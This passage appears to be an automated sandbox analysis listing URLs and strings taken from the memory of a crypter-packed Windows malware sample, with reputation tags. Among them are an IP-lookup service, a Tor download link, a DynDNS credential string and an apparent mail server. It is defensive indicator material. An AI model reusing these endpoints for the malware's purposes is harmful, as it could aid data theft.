                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/staff/dennis.htm/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.goodfont.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htm2SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipify.orgSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://fontfabrik.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comgritaSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.coms-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ascendercorp.com/typedesigners.html/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comd--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comB.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/dSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comrsiv_-lSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsinrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comasF;-SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comml-YSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fonts.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.com%(SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comalsdSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/H-uSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.galapagosdesign.com/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://mail.strictfacilityservices.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/;-SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comdfSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comcomtSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comdSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
